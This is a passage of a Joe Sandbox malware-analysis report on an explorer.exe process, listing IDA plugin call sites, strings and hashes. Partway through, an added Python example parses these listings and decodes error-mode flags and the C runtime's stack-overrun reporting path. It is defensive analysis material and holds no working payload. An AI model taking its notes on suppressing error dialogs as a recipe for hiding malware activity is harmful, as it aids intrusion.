                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                      • Instruction ID: dc76602003dc737bfd4e4c5a7b8f7fad26971a4ee3712020fc89e85bf01dc258
                                                                                                                      • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                      • Instruction Fuzzy Hash: 31D05E627503082BE610FAE49C06F2732CD5B55B14F490064FA48973C3D954E0004565
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
                                                                                                                      • Instruction ID: 66daf1e35294b94972a1a512fdbae4fc8832d0a98553db55555fa20084c0122b
                                                                                                                      • Opcode Fuzzy Hash: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
                                                                                                                      • Instruction Fuzzy Hash: 64B09B719015D5C5FB11F764470871779516BD0705F15C071E2034641E4778D1D1F175
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,004A7B29,003C5E78), ref: 004A79E6
                                                                                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A79FB
                                                                                                                      • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(){Jx^<,?,004A7B29,003C5E78), ref: 004A7A04
                                                                                                                      • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,004A7B29,003C5E78), ref: 004A7A20
                                                                                                                      • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A7A27
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4153712059.0000000000699000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4153712059.000000000069E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155839247.00000000006A8000.00000002.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000006A9000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000751000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000780000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000789000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000790000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000794000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000797000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007A4000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007AB000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007AF000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007B1000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007B3000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007C9000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007D0000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007D4000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007DE000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007E1000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_3c0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID: ){Jx^<
                                                                                                                      • API String ID: 2579439406-3128928623
                                                                                                                      • Opcode ID: 4c9b701f18dde9701dfc2cd8c86270c58199e8adf8c559b03be081142c3e2255
                                                                                                                      • Instruction ID: 37c35a778b2b876cccc396a1656fba3a4a408888106c2ade5ee89a8f1a55979e
                                                                                                                      • Opcode Fuzzy Hash: 4c9b701f18dde9701dfc2cd8c86270c58199e8adf8c559b03be081142c3e2255
                                                                                                                      • Instruction Fuzzy Hash: 54E09A72441204EFEB00AFA1FE0EB593B6EEB64716F00741BF609858A2DFB659408A55
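The entries above are the raw output of the Joe Sandbox IDA plugin: one `Func.MODULE(args), ref: ADDR` line per call site, with the arguments shown as the stack slots the plugin reads at the call rather than as the API's real prototype. Two of them deserve decoding by hand. SetErrorMode(00008003) is SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX, the usual way of suppressing Windows error dialogs so a crash does not leave a visible box. The five-call run IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with C0000409 (STATUS_STACK_BUFFER_OVERRUN) in a stack slot has the shape of the MSVC runtime's security-failure reporting path (the code that fires on a stack-cookie check failure), so the IsDebuggerPresent in this particular function is not by itself evidence of anti-debugging; and because GetCurrentProcess takes no parameters, the C0000409 listed as its "argument" is best read as the exit code already pushed for the TerminateProcess that follows. The Python below is an added example, not part of the report or of Joe Sandbox's own tooling: it parses API lines copied from this listing (constructed input) into structured records, decodes the SetErrorMode flags and PostThreadMessageW message numbers, and flags that CRT sequence. The function and constant names are my own; the flag and message values come from winbase.h and winuser.h.

```python
# Added example (not from the Joe Sandbox report): parse the IDA plugin's
# "Func.MODULE(args), ref: ADDR" lines and decode the constants in them.
import re
from typing import NamedTuple, Optional

# Constructed input: API lines copied from the listing above (explorer.exe, PID 5).
SAMPLE_LINES = """\
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0295F040,?,?,00000000), ref: 029691AC
• SetErrorMode.KERNELBASE(00008003,?,02958D14,?), ref: 0295F6EB
• IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,004A7B29,003C5E78), ref: 004A79E6
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A79FB
• UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(){Jx^<,?,004A7B29,003C5E78), ref: 004A7A04
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,004A7B29,003C5E78), ref: 004A7A20
• TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A7A27
"""

# One line per call site; the arguments are stack slots read at the call, not a prototype.
API_LINE = re.compile(r"(?P<func>\w+)\.(?P<module>[\w.-]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

class ApiCall(NamedTuple):
    func: str
    module: str
    args: tuple      # int for hex values, None for '?', str for text the plugin printed
    ref: int         # address of the call instruction

def parse_arg(token: str):
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)    # "-00000002" parses as -2
    except ValueError:
        return token             # e.g. "){Jx^<": a pointer target rendered as text

def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            raw = m.group("args")
            args = tuple(parse_arg(t) for t in raw.split(",")) if raw else ()
            calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

# SetErrorMode flag bits (winbase.h).
SEM_FLAGS = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
             0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}

def decode_error_mode(value: int) -> str:
    names = [name for bit, name in sorted(SEM_FLAGS.items()) if value & bit]
    leftover = value & ~sum(SEM_FLAGS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) or "0"

WM_KNOWN, WM_APP = {0x0111: "WM_COMMAND"}, 0x8000

def decode_window_message(msg: int) -> str:
    if msg in WM_KNOWN:
        return WM_KNOWN[msg]
    if WM_APP <= msg < 0xC000:
        return f"WM_APP+0x{msg - WM_APP:X}"   # private message range, e.g. 0x8003
    return f"0x{msg:04X}"

STATUS_STACK_BUFFER_OVERRUN = 0xC0000409
# Call order of the MSVC runtime's security-failure reporting path.
CRT_SECURITY_FAILURE_SEQ = ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
                            "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess")

def find_crt_security_failure(calls) -> Optional[tuple]:
    """Refs of the five calls when they appear in CRT order with 0xC0000409 in a
    stack slot, else None. A hit is the compiler's runtime, not anti-debugging."""
    it, hits = iter(calls), []
    for want in CRT_SECURITY_FAILURE_SEQ:
        for call in it:
            if call.func == want:
                hits.append(call)
                break
        else:
            return None
    if not any(STATUS_STACK_BUFFER_OVERRUN in c.args for c in hits):
        return None
    return tuple(c.ref for c in hits)

def annotate(calls) -> dict:
    """ref -> decoded reading for the calls whose raw arguments hide a meaning."""
    notes = {}
    for c in calls:
        if c.func == "SetErrorMode" and c.args and isinstance(c.args[0], int):
            notes[c.ref] = f"SetErrorMode({decode_error_mode(c.args[0])})"
        elif c.func == "PostThreadMessageW" and len(c.args) > 1 and isinstance(c.args[1], int):
            notes[c.ref] = f"PostThreadMessageW(msg={decode_window_message(c.args[1])})"
    return notes

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    print(annotate(calls), find_crt_security_failure(calls))
```

Run against the whole report text rather than the constructed sample, the same parser gives a per-process list of call sites keyed by address; the sequence check is deliberately order-sensitive and requires the STATUS value, so an unrelated function that merely calls IsDebuggerPresent is not matched. The second PostThreadMessageW message, 0x8003, decodes to WM_APP+3, a private message number whose meaning is specific to the receiving thread and cannot be recovered from the listing alone.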
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 2661c99d3ebab25732793ef1aa4d0e17c2163743b4ae2eae0f5399dfcf2e7288
• Instruction ID: 00aa35b0c8a93fc3ea860f49ca2ddf72a5fd9fd9925a99fd3b6be661dfae5b08
• Opcode Fuzzy Hash: 2661c99d3ebab25732793ef1aa4d0e17c2163743b4ae2eae0f5399dfcf2e7288
• Instruction Fuzzy Hash: DF510BB2B005267FDB20DF99899097EF7B9BB0820475482A9E495D7641E3B4FF40DBE0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 25ffb7627ab28c9e1f4c0192a24def0424426e72a57a31cdb9cd8bc32c0fd88e
• Instruction ID: f24b83c0e9ad4dd003b32227f27a5887402222474c093c40eb2d0400350b565c
• Opcode Fuzzy Hash: 25ffb7627ab28c9e1f4c0192a24def0424426e72a57a31cdb9cd8bc32c0fd88e
• Instruction Fuzzy Hash: 7451E371A00645BBDF20DE9DC89497EB7FAEB44204B0488A9E4D6D7642E6B4FF409B60
Strings
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C546FC
• Execute=1, xrefs: 04C54713
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C54725
• ExecuteOptions, xrefs: 04C546A0
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C54742
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C54655
• CLIENT(ntdll): Processing section info %ws..., xrefs: 04C54787
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: a21c3004944b92d8137031922a057fa30d65404bf262ac26382ac52b32941c63
• Instruction ID: f11037dae911d7337b5e0a27d4ebf9f39da8a94f5912dae943b84d67388379ea
• Opcode Fuzzy Hash: a21c3004944b92d8137031922a057fa30d65404bf262ac26382ac52b32941c63
• Instruction Fuzzy Hash: F35108316012197BEF11ABA5EC85FAE77BAEF06304F0400D9E505A71A1EB70BE81EF54
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: 0a2f2b59104f64c76d672053356db8223a13c79e1341869636d67f9fb7aca08d
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: 1581E530E052698FDF28CE68CA517FEBBB3AF45710F184519D865A7291E7B4BE40CB60
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 8293fec1c4a3be6f8193a853c8a4e5c50c3fee3d1ac8807da89f7c3d94f8e5db
• Instruction ID: a4b484f0aaf41d8950b20dc236cd9db4e3ce0e24e0b9bef3f81bda2bcf9e3c4a
• Opcode Fuzzy Hash: 8293fec1c4a3be6f8193a853c8a4e5c50c3fee3d1ac8807da89f7c3d94f8e5db
• Instruction Fuzzy Hash: BE21517AA00119BBDB10DFA9D844AAEBBFAEF44654F040566E945E3200E730EE119BA1
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C502BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C502E7
• RTL: Re-Waiting, xrefs: 04C5031E
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 29f39753fe9d90b5237922af91e952eb9de1adbbb107b8247d9e3c327a917d02
• Instruction ID: 369fbe08b9d962aa9a882e477bfc8d54dfd1fbb6cbf34ec98b2e9008657f83fb
• Opcode Fuzzy Hash: 29f39753fe9d90b5237922af91e952eb9de1adbbb107b8247d9e3c327a917d02
• Instruction Fuzzy Hash: AFE1BF306047419FD725CF29C884B2AB7E2BB88314F144A5DF995CB2E1E7B4FA85CB42
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C57B7F
• RTL: Resource at %p, xrefs: 04C57B8E
• RTL: Re-Waiting, xrefs: 04C57BAC
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 4a8880914d13ee3b1428d5a26838ce0fa98d252678bee5f279ac0009683fbc51
• Instruction ID: 66f4aad528d8779583e24038aa338fe2a7feef63eca043685332a96465f87e09
• Opcode Fuzzy Hash: 4a8880914d13ee3b1428d5a26838ce0fa98d252678bee5f279ac0009683fbc51
• Instruction Fuzzy Hash: C541E2357017029FD720DE26C840B6AB7E6EF89710F000A1DF85ADB6A0EB71F945AF91
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C5728C
Strings
• RTL: Resource at %p, xrefs: 04C572A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C57294
• RTL: Re-Waiting, xrefs: 04C572C1
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: d73b0a7dc1738bc032cd2653eb400b2647214d6af46111e1f60f966eec905ef4
• Instruction ID: d994806d04d5a62bcf3ec2b406b4f3ec3728c1da08671c97d50ef267045c0182
• Opcode Fuzzy Hash: d73b0a7dc1738bc032cd2653eb400b2647214d6af46111e1f60f966eec905ef4
• Instruction Fuzzy Hash: E9412231701202AFD720DE26DC41B7AB7A6FB85714F144618FD55EB260EB31F982ABD4
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 61ac8f60409f48a8db1afbd2fea6417204cb3290ff0239b6647387e4d705f693
• Instruction ID: 7b7f72ef4688a6aa50eebfe1f17081c3e2c5641d8b1c93163f77b94e03af5540
• Opcode Fuzzy Hash: 61ac8f60409f48a8db1afbd2fea6417204cb3290ff0239b6647387e4d705f693
• Instruction Fuzzy Hash: B2314376A00219BFDF20DE29DC44BEE77EDFB44614F444995E889E3241EB30BE449BA1
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction ID: 8847fb5d77350ad593050f1ec516be12d6d91dc18e14ab3a11f1a0bc4afb98ae
• Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction Fuzzy Hash: 2F91A270E052369FDF24DE69CAC16BEB7A7BF44720F14461AE855E72C0E7B0BA408761
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: fd88892214e833801bdd48b5bf52c4332d7a69ed5c86a764159a7f82346beb57
                                                                                                                      • Instruction ID: eece0610a7a114f33c64c18484fdcff391afbc5bc87f4a77ca1e5a49b037c1e0
                                                                                                                      • Opcode Fuzzy Hash: fd88892214e833801bdd48b5bf52c4332d7a69ed5c86a764159a7f82346beb57
                                                                                                                      • Instruction Fuzzy Hash: 80813BB5D002699BDB31CF54CD45BEEB7B5AB48754F0041EAE919B7280E730AE84DFA0
                                                                                                                      APIs
                                                                                                                      • RtlGetReturnAddressHijackTarget.NTDLL ref: 04BE0564
                                                                                                                      Strings
                                                                                                                      • kLsE, xrefs: 04BE0540
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04BE063D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHijackReturnTarget
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 806345674-2547482624
                                                                                                                      • Opcode ID: 73be20d8ce70bd7e28621ab80591e0a9dc5a069e3797869eacfc24ab0b53c634
                                                                                                                      • Instruction ID: 62c979b2a68c5fc85f487b0f7c5bcfd9a75bb8fa22f23d26151a8970a3110a6f
                                                                                                                      • Opcode Fuzzy Hash: 73be20d8ce70bd7e28621ab80591e0a9dc5a069e3797869eacfc24ab0b53c634
                                                                                                                      • Instruction Fuzzy Hash: 315189716047529FD724EF66C5807B7B7E4EFC5304F00887EE9AA87240E7B4A545CBA2